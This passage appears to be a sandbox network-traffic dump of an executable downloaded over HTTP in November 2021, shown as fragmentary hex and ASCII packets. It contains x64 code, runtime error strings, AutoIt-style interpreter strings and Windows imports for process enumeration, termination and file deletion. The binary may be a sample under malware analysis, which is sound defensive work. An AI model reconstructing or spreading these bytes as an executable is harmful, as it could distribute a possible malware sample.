                                                                                                                                                                                2021-11-11 11:26:27 UTC6938INData Raw: 13 fd ff 48 8b cd 48 8b d8 e8 76 13 fd ff 4c 89 6c 24 30 4c 89 64 24 28 48 89 74 24 20 4c 8b cb e9 88 00 00 00 48 8b 42 08 48 8b 48 10 48 8b 58 08 48 8b 38 e8 4b 13 fd ff 48 8b cb 48 8b f0 e8 40 13 fd ff 48 8b cf 48 8b d8 e8 35 13 fd ff 4c 89 6c 24 30 48 83 64 24 28 00 eb bc 48 8b 42 08 48 8b 48 08 48 8b 18 e8 18 13 fd ff 48 8b cb 48 8b f8 e8 0d 13 fd ff 4c 89 6c 24 30 48 83 64 24 28 00 48 83 64 24 20 00 4c 8b cf eb 20 48 8b 42 08 48 8b 08 e8 eb 12 fd ff 4c 89 6c 24 30 48 83 64 24 28 00 48 83 64 24 20 00 45 33 c9 4c 8d 05 d0 73 00 00 48 8b d0 49 8b ce e8 f5 e6 ff ff 48 8b 5c 24 60 48 8b 6c 24 68 48 8b 74 24 70 48 8b 7c 24 78 33 c0 48 83 c4 40 41 5e 41 5d 41 5c c3 cc cc cc cc 4c 8b dc 49 89 5b 08 4d 89 4b 20 55 56 57 41 54 41 55 41 56 41 57 48 81 ec c0 00
                                                                                                                                                                                Data Ascii: HHvLl$0Ld$(Ht$ LHBHHHXH8KHH@HH5Ll$0Hd$(HBHHHHHLl$0Hd$(Hd$ L HBHLl$0Hd$(Hd$ E3LsHIH\$`Hl$hHt$pH|$x3H@A^A]A\LI[MK UVWATAUAVAWH
                                                                                                                                                                                2021-11-11 11:26:27 UTC6939INData Raw: 00 44 8b c0 e8 c7 66 f8 ff 48 8d 8c 24 90 00 00 00 e9 13 fe ff ff 83 ff 17 0f 8c 12 fe ff ff 83 ff 1a 0f 8e f2 fd ff ff 83 ff 1b 74 24 83 ff 1c 0f 84 e1 fd ff ff 83 ff 1d 0f 85 f2 fd ff ff 49 8b 40 08 8b dd 4c 8b 30 e9 e4 fd ff ff 48 83 c8 ff 0b da 83 cb 04 48 8b f0 e9 d3 fd ff ff cc cc cc cc cc cc 4d 8b c8 4c 8b c2 ba 1d 00 00 00 e9 70 fc ff ff 4d 8b c8 4c 8b c2 ba 15 00 00 00 e9 60 fc ff ff 4d 8b c8 4c 8b c2 ba 16 00 00 00 e9 50 fc ff ff 4d 8b c8 4c 8b c2 ba 11 00 00 00 e9 40 fc ff ff 4d 8b c8 4c 8b c2 ba 10 00 00 00 e9 30 fc ff ff 4d 8b c8 4c 8b c2 ba 0b 00 00 00 e9 20 fc ff ff 4d 8b c8 4c 8b c2 ba 0a 00 00 00 e9 10 fc ff ff 4d 8b c8 4c 8b c2 ba 1a 00 00 00 e9 00 fc ff ff 4d 8b c8 4c 8b c2 ba 12 00 00 00 e9 f0 fb ff ff 4d 8b c8 4c 8b c2 ba 08 00 00 00
                                                                                                                                                                                Data Ascii: DfH$t$I@L0HHMLpML`MLPML@ML0ML MLMLMLML
                                                                                                                                                                                2021-11-11 11:26:27 UTC6955INData Raw: 4c 8b ac 24 90 00 00 00 4d 3b ef 75 6c 48 8d 15 a0 64 00 00 48 8d 4c 24 30 e8 56 db f7 ff 44 8b 8c 24 88 02 00 00 4c 8d 44 24 30 48 8d 54 24 68 41 bd 10 00 00 00 48 8b ce 44 89 6c 24 20 e8 41 dd fe ff 4c 8d 8c 24 88 02 00 00 4c 8d 84 24 90 00 00 00 48 8d 54 24 68 48 8b ce 44 89 6c 24 20 e8 0f b3 f7 ff 4c 8b ac 24 90 00 00 00 4d 3b ef 0f 84 20 05 00 00 45 8a f7 48 8d 0d 5c 17 03 00 e8 cf a7 fa ff 41 b9 00 04 00 00 4d 8b c5 48 8d 54 24 48 48 8b ce 41 3a c7 74 0a c7 44 24 20 02 00 00 00 eb 08 c7 44 24 20 01 00 00 00 e8 92 b6 fd ff 4c 8d 8c 24 88 02 00 00 4c 8d 84 24 b8 00 00 00 48 8d 54 24 48 48 8b ce 44 89 64 24 20 e8 a0 b2 f7 ff eb 2a 81 bc 24 88 02 00 00 00 04 00 00 0f 85 05 05 00 00 e8 d8 a2 fa ff 4c 8b e8 48 89 84 24 90 00 00 00 49 3b c7 0f 84 ec 04 00
                                                                                                                                                                                Data Ascii: L$M;ulHdHL$0VD$LD$0HT$hAHDl$ AL$L$HT$hHDl$ L$M; EH\AMHT$HHA:tD$ D$ L$L$HT$HHDd$ *$LH$I;
                                                                                                                                                                                2021-11-11 11:26:27 UTC6956INData Raw: 08 ff c6 48 89 84 24 88 00 00 00 8b c6 48 3b 45 10 48 8b 84 24 88 00 00 00 0f 82 71 ff ff ff 4c 63 84 24 90 02 00 00 45 33 ff 4d 3b c7 7e 13 48 8d 8c 24 c0 00 00 00 49 c1 e0 02 33 d2 e8 d2 1e f8 ff 48 8d 84 24 c0 00 00 00 4d 8b cd 4c 8b c7 48 8b d5 48 8b cb c7 44 24 28 01 00 00 00 48 89 44 24 20 e8 cc f7 ff ff 41 3a c7 0f 84 9b 01 00 00 e9 df 00 00 00 e8 79 9b fb ff 84 c0 0f 85 60 01 00 00 8b c6 45 33 f6 48 63 ce 48 3b 45 10 0f 83 90 00 00 00 49 8d 0c cc 41 8d 56 7f 48 89 8c 24 88 00 00 00 4c 8b 21 41 0f b7 44 24 08 66 3b c2 74 72 66 83 f8 4e 74 53 41 b8 47 00 00 00 66 41 3b c0 74 47 66 83 f8 4f 74 3c 66 83 f8 48 74 36 66 83 f8 40 75 05 45 85 f6 74 49 66 83 f8 33 75 2d 49 8b 0c 24 48 8d 54 24 48 e8 84 cf f7 ff 84 c0 0f 85 d9 00 00 00 48 8b 8c 24 88 00 00
                                                                                                                                                                                Data Ascii: H$H;EH$qLc$E3M;~H$I3H$MLHHD$(HD$ A:y`E3HcH;EIAVH$L!AD$f;trfNtSAGfA;tGfOt<fHt6f@uEtIf3u-I$HT$HH$
                                                                                                                                                                                2021-11-11 11:26:27 UTC6972INData Raw: 00 00 00 00 52 36 30 32 37 0d 0a 2d 20 6e 6f 74 20 65 6e 6f 75 67 68 20 73 70 61 63 65 20 66 6f 72 20 6c 6f 77 69 6f 20 69 6e 69 74 69 61 6c 69 7a 61 74 69 6f 6e 0d 0a 00 00 00 00 52 36 30 32 36 0d 0a 2d 20 6e 6f 74 20 65 6e 6f 75 67 68 20 73 70 61 63 65 20 66 6f 72 20 73 74 64 69 6f 20 69 6e 69 74 69 61 6c 69 7a 61 74 69 6f 6e 0d 0a 00 00 00 00 52 36 30 32 35 0d 0a 2d 20 70 75 72 65 20 76 69 72 74 75 61 6c 20 66 75 6e 63 74 69 6f 6e 20 63 61 6c 6c 0d 0a 00 00 00 52 36 30 32 34 0d 0a 2d 20 6e 6f 74 20 65 6e 6f 75 67 68 20 73 70 61 63 65 20 66 6f 72 20 5f 6f 6e 65 78 69 74 2f 61 74 65 78 69 74 20 74 61 62 6c 65 0d 0a 00 00 00 00 52 36 30 31 39 0d 0a 2d 20 75 6e 61 62 6c 65 20 74 6f 20 6f 70 65 6e 20 63 6f 6e 73 6f 6c 65 20 64 65 76 69 63 65 0d 0a 00 00 00
                                                                                                                                                                                Data Ascii: R6027- not enough space for lowio initializationR6026- not enough space for stdio initializationR6025- pure virtual function callR6024- not enough space for _onexit/atexit tableR6019- unable to open console device
                                                                                                                                                                                2021-11-11 11:26:27 UTC6973INData Raw: 00 06 02 10 04 45 45 45 05 05 05 05 05 35 30 00 50 00 00 00 00 28 20 38 50 58 07 08 00 37 30 30 57 50 07 00 00 20 20 08 00 00 00 00 08 60 68 60 60 60 60 00 00 78 70 78 78 78 78 08 07 08 00 00 07 00 08 08 08 00 00 08 00 08 00 07 08 00 00 00 00 00 00 00 63 00 63 00 73 00 00 00 55 00 54 00 46 00 2d 00 38 00 00 00 00 00 00 00 55 00 54 00 46 00 2d 00 31 00 36 00 4c 00 45 00 00 00 00 00 00 00 00 00 55 00 4e 00 49 00 43 00 4f 00 44 00 45 00 00 00 63 63 73 00 55 54 46 2d 38 00 00 00 00 00 00 00 55 54 46 2d 31 36 4c 45 00 00 00 00 00 00 00 00 55 4e 49 43 4f 44 45 00 18 2d 44 54 fb 21 f9 3f 00 00 00 50 fb 21 f9 3f 00 00 00 60 b4 10 51 3e 06 5c 14 33 26 a6 91 3c 00 00 00 00 00 00 00 c0 5f 6c 6f 67 62 00 00 00 5f 79 6e 00 5f 79 31 00 5f 79 30 00 66 72 65 78 70 00 00
                                                                                                                                                                                Data Ascii: EEE50P( 8PX700WP `h````xpxxxxccsUTF-8UTF-16LEUNICODEccsUTF-8UTF-16LEUNICODE-DT!?P!?`Q>\3&<_logb_yn_y1_y0frexp
                                                                                                                                                                                2021-11-11 11:26:27 UTC6989INData Raw: 73 20 28 6d 61 78 69 6d 75 6d 20 31 30 30 30 30 29 00 72 65 70 65 61 74 65 64 20 73 75 62 70 61 74 74 65 72 6e 20 69 73 20 74 6f 6f 20 6c 6f 6e 67 00 6f 63 74 61 6c 20 76 61 6c 75 65 20 69 73 20 67 72 65 61 74 65 72 20 74 68 61 6e 20 5c 33 37 37 20 28 6e 6f 74 20 69 6e 20 55 54 46 2d 38 20 6d 6f 64 65 29 00 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 3a 20 6f 76 65 72 72 61 6e 20 63 6f 6d 70 69 6c 69 6e 67 20 77 6f 72 6b 73 70 61 63 65 00 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 3a 20 70 72 65 76 69 6f 75 73 6c 79 2d 63 68 65 63 6b 65 64 20 72 65 66 65 72 65 6e 63 65 64 20 73 75 62 70 61 74 74 65 72 6e 20 6e 6f 74 20 66 6f 75 6e 64 00 44 45 46 49 4e 45 20 67 72 6f 75 70 20 63 6f 6e 74 61 69 6e 73 20 6d 6f 72 65 20 74 68 61 6e 20 6f 6e 65 20 62 72 61 6e 63
                                                                                                                                                                                Data Ascii: s (maximum 10000)repeated subpattern is too longoctal value is greater than \377 (not in UTF-8 mode)internal error: overran compiling workspaceinternal error: previously-checked referenced subpattern not foundDEFINE group contains more than one branc
                                                                                                                                                                                2021-11-11 11:26:27 UTC6990INData Raw: 00 00 00 00 53 00 74 00 72 00 69 00 6e 00 67 00 46 00 69 00 6c 00 65 00 49 00 6e 00 66 00 6f 00 5c 00 00 00 5c 00 56 00 61 00 72 00 46 00 69 00 6c 00 65 00 49 00 6e 00 66 00 6f 00 5c 00 54 00 72 00 61 00 6e 00 73 00 6c 00 61 00 74 00 69 00 6f 00 6e 00 00 00 00 00 00 00 00 00 30 00 34 00 30 00 39 00 30 00 30 00 30 00 30 00 00 00 00 00 00 00 00 00 44 00 65 00 66 00 61 00 75 00 6c 00 74 00 4c 00 61 00 6e 00 67 00 43 00 6f 00 64 00 65 00 70 00 61 00 67 00 65 00 00 00 25 00 75 00 2e 00 25 00 75 00 2e 00 25 00 75 00 2e 00 25 00 75 00 00 00 5c 00 2a 00 2e 00 2a 00 00 00 00 00 2e 00 00 00 2a 00 3f 00 00 00 00 00 30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 00 00 6f 00 70 00 65 00 6e 00 20 00 00 00 00 00 00 00 20 00 61 00 6c 00 69 00 61 00 73 00 20 00 50 00 6c 00 61
                                                                                                                                                                                Data Ascii: StringFileInfo\\VarFileInfo\Translation04090000DefaultLangCodepage%u.%u.%u.%u\*.*.*?0.0.0.0open alias Pla
                                                                                                                                                                                2021-11-11 11:26:27 UTC7006INData Raw: 74 00 65 00 20 00 74 00 68 00 65 00 20 00 45 00 76 00 65 00 6e 00 74 00 20 00 4f 00 62 00 6a 00 65 00 63 00 74 00 2e 00 00 00 00 00 5f 00 4e 00 65 00 77 00 45 00 6e 00 75 00 6d 00 00 00 00 00 00 00 00 00 67 00 65 00 74 00 5f 00 5f 00 4e 00 65 00 77 00 45 00 6e 00 75 00 6d 00 00 00 00 00 00 00 00 00 4e 00 75 00 6c 00 6c 00 20 00 4f 00 62 00 6a 00 65 00 63 00 74 00 20 00 61 00 73 00 73 00 69 00 67 00 6e 00 6d 00 65 00 6e 00 74 00 20 00 69 00 6e 00 20 00 46 00 4f 00 52 00 2e 00 2e 00 49 00 4e 00 20 00 6c 00 6f 00 6f 00 70 00 00 00 00 00 49 00 6e 00 63 00 6f 00 72 00 72 00 65 00 63 00 74 00 20 00 4f 00 62 00 6a 00 65 00 63 00 74 00 20 00 74 00 79 00 70 00 65 00 20 00 69 00 6e 00 20 00 46 00 4f 00 52 00 2e 00 2e 00 49 00 4e 00 20 00 6c 00 6f 00 6f 00 70 00 00
                                                                                                                                                                                Data Ascii: te the Event Object._NewEnumget__NewEnumNull Object assignment in FOR..IN loopIncorrect Object type in FOR..IN loop
                                                                                                                                                                                2021-11-11 11:26:27 UTC7007INData Raw: 45 00 52 00 50 00 52 00 4f 00 46 00 49 00 4c 00 45 00 44 00 49 00 52 00 00 00 00 00 54 00 45 00 4d 00 50 00 44 00 49 00 52 00 00 00 55 00 53 00 45 00 52 00 4e 00 41 00 4d 00 45 00 00 00 00 00 00 00 00 00 43 00 4f 00 4d 00 53 00 50 00 45 00 43 00 00 00 43 00 4f 00 4d 00 50 00 49 00 4c 00 45 00 44 00 00 00 00 00 00 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 52 00 45 00 46 00 52 00 45 00 53 00 48 00 00 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 44 00 45 00 50 00 54 00 48 00 00 00 00 00 00 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 48 00 45 00 49 00 47 00 48 00 54 00 00 00 00 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 57 00 49 00 44 00 54 00 48 00 00 00 00 00 00 00 00 00 43 00 52 00 4c 00 46 00 00 00 00 00 4c 00 46 00 00 00 00
                                                                                                                                                                                Data Ascii: ERPROFILEDIRTEMPDIRUSERNAMECOMSPECCOMPILEDDESKTOPREFRESHDESKTOPDEPTHDESKTOPHEIGHTDESKTOPWIDTHCRLFLF
                                                                                                                                                                                2021-11-11 11:26:27 UTC7023INData Raw: a0 44 00 00 b2 44 00 00 18 66 0a 00 01 06 02 00 06 32 02 60 01 1d 09 00 1d 64 12 04 1d 54 11 04 1d 34 10 04 1d 01 0e 04 10 70 00 00 01 12 08 00 12 54 0e 00 12 34 0d 00 12 72 0e c0 0c 70 0b 60 01 2a 0c 00 2a 68 04 00 1e 34 15 00 1e 92 1a f0 18 e0 16 d0 14 c0 12 70 11 60 10 50 21 00 0a 00 00 d4 04 00 00 c4 05 00 00 74 0a 00 00 54 09 00 00 34 08 00 00 46 00 00 1f 46 00 00 00 67 0a 00 21 00 08 00 00 d4 04 00 00 c4 05 00 00 74 0a 00 00 54 09 00 00 46 00 00 1f 46 00 00 00 67 0a 00 21 0c 0a 00 0c 34 08 00 00 d4 04 00 00 c4 05 00 00 74 0a 00 00 54 09 00 00 46 00 00 1f 46 00 00 00 67 0a 00 21 00 00 00 00 46 00 00 1f 46 00 00 00 67 0a 00 21 14 08 00 14 d4 04 00 0f c4 05 00 0a 74 0a 00 05 54 09 00 00 46 00 00 1f 46 00 00 00 67 0a 00 01 06 02 00 06 52 02 60 21 00 00
                                                                                                                                                                                Data Ascii: DDf2`dT4pT4rp`**h4p`P!tT4FFg!tTFFg!4tTFFg!FFg!tTFFgR`!
                                                                                                                                                                                2021-11-11 11:26:27 UTC7024INData Raw: 05 68 02 00 e0 16 01 00 03 17 01 00 38 85 0a 00 01 0d 05 00 0d 34 1a 00 0d 01 18 00 06 70 00 00 01 1f 0d 00 1f 64 2e 00 1f 54 2d 00 1f 34 2c 00 1f 01 26 00 18 f0 16 e0 14 d0 12 c0 10 70 00 00 01 23 0d 00 23 64 2e 00 23 54 2d 00 23 34 2c 00 23 01 26 00 1c f0 1a e0 18 d0 16 c0 14 70 00 00 01 16 0a 00 16 34 0e 00 16 52 12 f0 10 e0 0e d0 0c c0 0a 70 09 60 08 50 01 26 0e 00 26 68 04 00 1c 64 13 00 1c 54 12 00 1c 34 10 00 1c 92 18 f0 16 e0 14 d0 12 c0 10 70 01 0f 03 00 0f 01 04 20 02 30 00 00 01 0c 06 00 0c 34 0d 00 0c 72 08 70 07 60 06 50 01 13 06 00 13 68 02 00 0a 34 08 00 0a 52 06 70 21 00 04 00 00 78 02 00 00 68 03 00 40 09 01 00 4f 09 01 00 94 5c 0a 00 21 00 02 00 00 78 02 00 40 09 01 00 4f 09 01 00 94 5c 0a 00 21 00 00 00 40 09 01 00 4f 09 01 00 94 5c 0a
                                                                                                                                                                                Data Ascii: h84pd.T-4,&p##d.#T-#4,#&p4Rp`P&&hdT4p 04rp`Ph4Rp!xh@O\!x@O\!@O\
                                                                                                                                                                                2021-11-11 11:26:27 UTC7040INData Raw: 6c 65 00 00 91 04 57 72 69 74 65 46 69 6c 65 00 42 01 46 6c 75 73 68 46 69 6c 65 42 75 66 66 65 72 73 00 00 31 04 54 65 72 6d 69 6e 61 74 65 50 72 6f 63 65 73 73 00 00 ac 00 43 72 65 61 74 65 54 6f 6f 6c 68 65 6c 70 33 32 53 6e 61 70 73 68 6f 74 00 00 3e 03 50 72 6f 63 65 73 73 33 32 46 69 72 73 74 57 00 40 03 50 72 6f 63 65 73 73 33 32 4e 65 78 74 57 00 00 e8 03 53 65 74 46 69 6c 65 54 69 6d 65 00 cf 01 47 65 74 46 69 6c 65 41 74 74 72 69 62 75 74 65 73 57 00 00 25 01 46 69 6e 64 46 69 72 73 74 46 69 6c 65 57 00 00 1a 01 46 69 6e 64 43 6c 6f 73 65 00 c4 00 44 65 6c 65 74 65 46 69 6c 65 57 00 31 01 46 69 6e 64 4e 65 78 74 46 69 6c 65 57 00 b5 04 6c 73 74 72 63 6d 70 69 57 00 10 03 4d 6f 76 65 46 69 6c 65 57 00 66 00 43 6f 70 79 46 69 6c 65 57 00 72 00 43
                                                                                                                                                                                Data Ascii: leWriteFileBFlushFileBuffers1TerminateProcessCreateToolhelp32Snapshot>Process32FirstW@Process32NextWSetFileTimeGetFileAttributesW%FindFirstFileWFindCloseDeleteFileW1FindNextFileWlstrcmpiWMoveFileWfCopyFileWrC
                                                                                                                                                                                2021-11-11 11:26:27 UTC7041INData Raw: 74 44 72 69 76 65 54 79 70 65 57 00 b7 01 47 65 74 44 69 73 6b 46 72 65 65 53 70 61 63 65 45 78 57 00 b8 01 47 65 74 44 69 73 6b 46 72 65 65 53 70 61 63 65 57 00 79 02 47 65 74 56 6f 6c 75 6d 65 49 6e 66 6f 72 6d 61 74 69 6f 6e 57 00 1d 04 53 65 74 56 6f 6c 75 6d 65 4c 61 62 65 6c 57 00 84 00 43 72 65 61 74 65 48 61 72 64 4c 69 6e 6b 57 00 cb 00 44 65 76 69 63 65 49 6f 43 6f 6e 74 72 6f 6c 00 df 03 53 65 74 46 69 6c 65 41 74 74 72 69 62 75 74 65 73 57 00 00 38 02 47 65 74 53 68 6f 72 74 50 61 74 68 4e 61 6d 65 57 00 76 00 43 72 65 61 74 65 45 76 65 6e 74 57 00 00 d8 03 53 65 74 45 76 65 6e 74 00 00 c4 01 47 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 56 61 72 69 61 62 6c 65 57 00 d6 03 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 56 61 72 69 61 62 6c 65 57 00 90
                                                                                                                                                                                Data Ascii: tDriveTypeWGetDiskFreeSpaceExWGetDiskFreeSpaceWyGetVolumeInformationWSetVolumeLabelWCreateHardLinkWDeviceIoControlSetFileAttributesW8GetShortPathNameWvCreateEventWSetEventGetEnvironmentVariableWSetEnvironmentVariableW
                                                                                                                                                                                2021-11-11 11:26:27 UTC7057INData Raw: 01 00 00 00 e0 28 0a 40 01 00 00 00 c8 28 0a 40 01 00 00 00 b0 28 0a 40 01 00 00 00 88 28 0a 40 01 00 00 00 70 28 0a 40 01 00 00 00 60 28 0a 40 01 00 00 00 48 28 0a 40 01 00 00 00 38 28 0a 40 01 00 00 00 18 28 0a 40 01 00 00 00 08 28 0a 40 01 00 00 00 e8 27 0a 40 01 00 00 00 d8 27 0a 40 01 00 00 00 c8 27 0a 40 01 00 00 00 b0 27 0a 40 01 00 00 00 90 27 0a 40 01 00 00 00 78 27 0a 40 01 00 00 00 60 27 0a 40 01 00 00 00 48 27 0a 40 01 00 00 00 30 27 0a 40 01 00 00 00 18 27 0a 40 01 00 00 00 0c 27 0a 40 01 00 00 00 04 27 0a 40 01 00 00 00 f8 26 0a 40 01 00 00 00 d8 26 0a 40 01 00 00 00 b8 26 0a 40 01 00 00 00 98 26 0a 40 01 00 00 00 78 26 0a 40 01 00 00 00 60 26 0a 40 01 00 00 00 50 26 0a 40 01 00 00 00 a8 c7 09 40 01 00 00 00 38 26 0a 40 01 00 00 00 28 26 0a
                                                                                                                                                                                Data Ascii: (@(@(@(@p(@`(@H(@8(@(@(@'@'@'@'@'@x'@`'@H'@0'@'@'@'@&@&@&@&@x&@`&@P&@@8&@(&
                                                                                                                                                                                2021-11-11 11:26:27 UTC7058INData Raw: 00 00 00 00 78 b3 09 40 01 00 00 00 0c 00 00 00 00 00 00 00 78 b4 09 40 01 00 00 00 00 00 00 00 00 00 00 00 68 b4 09 40 01 00 00 00 01 00 00 00 00 00 00 00 58 b4 09 40 01 00 00 00 02 00 00 00 00 00 00 00 48 b4 09 40 01 00 00 00 03 00 00 00 00 00 00 00 28 b4 09 40 01 00 00 00 04 00 00 00 00 00 00 00 10 b4 09 40 01 00 00 00 05 00 00 00 00 00 00 00 00 b4 09 40 01 00 00 00 06 00 00 00 00 00 00 00 e8 b3 09 40 01 00 00 00 07 00 00 00 00 00 00 00 d0 b3 09 40 01 00 00 00 08 00 00 00 00 00 00 00 b0 b3 09 40 01 00 00 00 09 00 00 00 00 00 00 00 98 b3 09 40 01 00 00 00 0a 00 00 00 00 00 00 00 88 b3 09 40 01 00 00 00 0b 00 00 00 00 00 00 00 78 b3 09 40 01 00 00 00 0c 00 00 00 00 00 00 00 78 b4 09 40 01 00 00 00 00 00 00 00 00 00 00 00 68 b4 09 40 01 00 00 00 01 00 00
                                                                                                                                                                                Data Ascii: x@x@h@X@H@(@@@@@@@@x@x@h@
                                                                                                                                                                                2021-11-11 11:26:27 UTC7074INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                2021-11-11 11:26:27 UTC7075INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                2021-11-11 11:26:27 UTC7091INData Raw: e8 52 0a 00 a0 1f 04 00 03 20 04 00 2c 42 0a 00 50 20 04 00 fb 20 04 00 00 42 0a 00 30 22 04 00 c2 22 04 00 6c 58 0a 00 d0 22 04 00 06 23 04 00 7c 50 0a 00 20 23 04 00 5b 23 04 00 7c 50 0a 00 e0 23 04 00 43 24 04 00 7c 50 0a 00 50 24 04 00 91 25 04 00 ac 52 0a 00 b0 25 04 00 ef 25 04 00 f8 3e 0a 00 f0 25 04 00 0e 26 04 00 f8 3e 0a 00 10 26 04 00 82 28 04 00 44 54 0a 00 c0 28 04 00 dd 28 04 00 8c 5a 0a 00 e0 28 04 00 a3 29 04 00 a4 68 0a 00 b0 29 04 00 58 2a 04 00 6c 58 0a 00 b0 2a 04 00 0e 2b 04 00 f8 3e 0a 00 10 2b 04 00 20 2c 04 00 6c 58 0a 00 20 2c 04 00 46 2c 04 00 8c 5a 0a 00 a0 2c 04 00 83 2d 04 00 5c 54 0a 00 a0 2d 04 00 cd 2d 04 00 f8 3e 0a 00 e0 2d 04 00 40 2e 04 00 34 65 0a 00 40 2e 04 00 8a 2e 04 00 7c 50 0a 00 90 2e 04 00 af 2e 04 00 ec 3f 0a
                                                                                                                                                                                Data Ascii: R ,BP B0""lX"#|P #[#|P#C$|PP$%R%%>%&>&(DT((Z()h)X*lX*+>+ ,lX ,F,Z,-\T-->-@.4e@..|P..?
                                                                                                                                                                                2021-11-11 11:26:27 UTC7092INData Raw: c0 d0 04 00 5e d2 04 00 cc 7d 0a 00 60 d2 04 00 a2 d2 04 00 f8 3e 0a 00 b0 d2 04 00 4e d4 04 00 e8 54 0a 00 50 d4 04 00 d9 d4 04 00 6c 58 0a 00 e0 d4 04 00 0b d6 04 00 2c 56 0a 00 10 d6 04 00 cb d7 04 00 6c 58 0a 00 d0 d7 04 00 20 d8 04 00 8c 5a 0a 00 20 d8 04 00 c5 d8 04 00 44 56 0a 00 d0 d8 04 00 7a d9 04 00 4c 56 0a 00 80 d9 04 00 e3 d9 04 00 6c 58 0a 00 f0 d9 04 00 5b da 04 00 7c 50 0a 00 60 da 04 00 1c db 04 00 6c 58 0a 00 20 db 04 00 ea db 04 00 58 56 0a 00 f0 db 04 00 5e dd 04 00 6c 56 0a 00 60 dd 04 00 aa e0 04 00 84 56 0a 00 d0 e1 04 00 12 e2 04 00 f8 3e 0a 00 20 e2 04 00 62 e2 04 00 f8 3e 0a 00 70 e2 04 00 95 e2 04 00 f8 3e 0a 00 a0 e2 04 00 04 e4 04 00 e0 56 0a 00 a0 e4 04 00 c2 e4 04 00 f8 3e 0a 00 d0 e4 04 00 ff e4 04 00 7c 50 0a 00 00 e5 04
                                                                                                                                                                                Data Ascii: ^}`>NTPlX,VlX Z DVzLVlX[|P`lX XV^lV`V> b>p>V>|P
                                                                                                                                                                                2021-11-11 11:26:27 UTC7108INData Raw: 2c 3d 89 01 89 94 5f 11 e5 f2 77 44 28 71 93 96 5a 89 30 ce 83 cd 3f b1 a5 fe 48 c8 7b 33 ee 63 28 73 bf 8b 1e ef 18 c7 56 6c fd 5a 9f 0b c5 ce 97 50 7c 5f 84 71 9e 3f a1 d8 e9 14 4a 5c 27 41 7b df 8a 9d 97 52 c7 36 e6 3d 50 e2 1a 0a 25 d6 39 19 d7 ae dc 7b 2a fb ef d3 e1 24 4a 6a 7c f9 63 2a 09 ec 1f 4a 88 57 ae 36 b5 3a 75 ba 81 29 23 00 77 58 5a 70 cf 0e e1 48 93 5d 0d fe 65 d5 ea ee 75 78 93 ec 77 49 c4 12 12 a8 04 30 f9 d0 31 59 90 cb 3d d3 13 7c 41 e4 72 d7 37 d3 6f 04 b9 cc 1d 95 27 6b bb e3 ff 9a cb a2 47 8b 4b 87 5a bb 11 5e 26 ba bd 01 f9 f5 77 2d 37 9c 3a 65 04 c0 71 e7 4b 89 76 b3 c1 70 c2 62 67 12 ef f4 87 10 4c e5 fc 3a c5 af 08 19 6f 43 98 e4 ca 9c 30 be bb 47 2f 54 5e d0 4f de 76 e5 89 59 9d 3c 75 df d3 b3 94 23 6d 09 cc 06 01 76 b3 0e f3
                                                                                                                                                                                Data Ascii: ,=_wD(qZ0?H{3c(sVlZP|_q?J\'A{R6=P%9{*$Jj|c*JW6:u)#wXZpH]euxwI01Y=|Ar7o'kGKZ^&w-7:eqKvpbgL:oC0G/T^OvY<u#mv
